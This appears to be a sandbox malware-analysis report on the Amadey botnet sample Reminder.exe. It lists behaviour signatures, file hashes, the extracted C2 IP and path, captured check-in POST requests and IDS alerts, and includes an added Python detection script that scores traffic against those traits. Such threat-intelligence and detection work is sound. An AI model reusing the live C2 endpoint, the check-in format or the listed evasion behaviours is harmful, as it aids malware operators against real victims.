Windows Analysis Report
Reminder.exe

Overview

General Information

Sample name: Reminder.exe
Analysis ID: 1543320
MD5: df45696ef1463f335a6cc5dc72c607d0
SHA1: 699eaf22d81b5dd5a7177641d9a784db7dd80eb9
SHA256: 2e29ddac4856b370c1c8e7ebc3dd90afeafddaf932b17fcf91f1150d52ee28d7
Tags: ClickFix, exe, user-monitorsg

Detection

Amadey
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Sigma detected: Silenttrinity Stager Msbuild Activity
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "152.89.198.124/8bdDsv3dk2FF/index.php", "Version": "5.03", "Install Folder": "e7e219b706", "Install File": "Gxtuum.exe"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 97.7% probability
Source: Reminder.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 13.107.246.51:443 -> 192.168.2.4:57712 version: TLS 1.2
Source: Reminder.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_0073E180
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_0074A187
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_0074A2E4
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074A66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 35_2_0074A66E
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074686D FindFirstFileW,FindNextFileW,FindClose, 35_2_0074686D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E9BA GetFileAttributesW,FindFirstFileW,FindClose, 35_2_0073E9BA
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007474F0 FindFirstFileW,FindClose, 35_2_007474F0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00747591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 35_2_00747591
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_0073DE32
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A3ECD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 35_2_014A3ECD
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A17FD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 35_2_014A17FD
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014A3FD5 FindFirstFileA,GetLastError, 35_2_014A3FD5
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 38_2_00CEA187
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 38_2_00CDE180
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 38_2_00CEA2E4
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEA66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 38_2_00CEA66E
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE686D FindFirstFileW,FindNextFileW,FindClose, 38_2_00CE686D
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDE9BA GetFileAttributesW,FindFirstFileW,FindClose, 38_2_00CDE9BA
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE74F0 FindFirstFileW,FindClose, 38_2_00CE74F0
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CE7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 38_2_00CE7591
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 38_2_00CDDE32
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01653765 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 38_2_01653765
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01651095 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 38_2_01651095
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_0165386D FindFirstFileA,GetLastError, 38_2_0165386D

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:57736 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57723 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57783 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57751 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57808 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57835 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57893 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57862 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58000 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58002 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57920 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57947 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57979 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:57998 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:58004 -> 152.89.198.124:80
Source: Malware configuration extractor IPs: 152.89.198.124
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: global traffic TCP traffic: 192.168.2.4:57709 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Source: Joe Sandbox View IP Address: 152.89.198.124
Source: Joe Sandbox View ASN Name: NEXTVISIONGB
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 2.19.126.163
Source: unknown TCP traffic detected without corresponding DNS query: 217.20.57.22
Source: unknown TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074D935 InternetReadFile,SetEvent,GetLastError,SetEvent, 35_2_0074D935
Source: unknown HTTP traffic detected:
POST /8bdDsv3dk2FF/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 152.89.198.124
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001459000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.php
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001418000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.phped
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001447000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.phpp
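The two network observations above (TCP sessions to 152.89.198.124 with no preceding DNS query, and the 4-byte POST of st=s to /8bdDsv3dk2FF/index.php with a bare IP in the Host header) can be checked mechanically against sandbox or sensor telemetry. The Python below is an added example written for this page; it is not code from the report or from the Amadey family. The DNS answers, connection records and the benign CRL request are constructed for the example; the check-in request is rebuilt from the POST shown above with its CRLFs restored.

```python
"""Correlate network telemetry against the two C2 observations above.

Added example for this page, not code from the report or from Amadey.
Part 1 flags connections to IPs that no DNS answer produced (a C2 address
hard-coded in the malware configuration is never resolved). Part 2 parses
raw HTTP requests and lists which traits of the captured check-in they share.
All telemetry below is constructed for the example.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Set
from urllib.parse import parse_qs

# Constructed DNS answers: (timestamp, name queried, IP returned)
DNS_ANSWERS = [
    (1.0, "crl.sectigo.com", "104.18.38.233"),
    (1.2, "ocsp.certum.pl", "213.222.194.170"),
]

# Constructed outbound connections: (timestamp, destination IP, port)
CONNECTIONS = [
    (2.0, "104.18.38.233", 80),
    (2.5, "152.89.198.124", 80),
    (2.6, "152.89.198.124", 80),
    (3.0, "213.222.194.170", 80),
]

# Rebuilt from the POST shown in the report (CRLFs restored)
CAPTURED_CHECKIN = (
    b"POST /8bdDsv3dk2FF/index.php HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: 152.89.198.124\r\n"
    b"Content-Length: 4\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"st=s"
)

# Constructed benign request, the kind a signed installer's CRL check produces
BENIGN_CRL_FETCH = (
    b"GET /SectigoRSATimeStampingCA.crl HTTP/1.1\r\n"
    b"Host: crl.sectigo.com\r\n"
    b"\r\n"
)


def connections_without_dns(dns_answers, connections) -> Set[str]:
    """Destination IPs contacted before (or without) any DNS answer for them."""
    first_seen: Dict[str, float] = {}
    for ts, _name, ip in dns_answers:
        first_seen[ip] = min(ts, first_seen.get(ip, ts))
    return {ip for ts, ip, _port in connections
            if ip not in first_seen or first_seen[ip] > ts}


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str]   # header names lower-cased
    body: bytes


def parse_http_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.x request parser: CRLF-delimited head, raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def _is_bare_ip(host: str) -> bool:
    """True for an IPv4 literal Host header, with or without a :port suffix."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def checkin_traits(req: HttpRequest) -> List[str]:
    """Traits of the captured check-in that this request shares.

    Score them together, not alone: a bare-IP Host or a tiny form body is
    common by itself; the combination is what the report shows.
    """
    traits = []
    if req.method == "POST" and req.path.endswith("/index.php"):
        traits.append("post-to-index.php")
    if _is_bare_ip(req.headers.get("host", "")):
        traits.append("host-is-bare-ip")
    ctype = req.headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        traits.append("form-urlencoded")
    if 0 < len(req.body) <= 8:
        fields = parse_qs(req.body.decode("latin-1"))
        if set(fields) == {"st"}:
            traits.append("st-only-body")
    return traits


if __name__ == "__main__":
    print("direct-to-IP:", connections_without_dns(DNS_ANSWERS, CONNECTIONS))
    for raw in (CAPTURED_CHECKIN, BENIGN_CRL_FETCH):
        req = parse_http_request(raw)
        print(req.method, req.path, "->", checkin_traits(req))
```

The DNS correlation only needs a flow log and a DNS log with comparable timestamps; on real sensors, allow for the resolver's TTL and for answers cached before the capture started, or every CDN connection will be flagged. The trait list is meant to be thresholded (all four matched here), not used as a single-trait block rule.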
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cscasha2.ocsp-ce
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.us
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
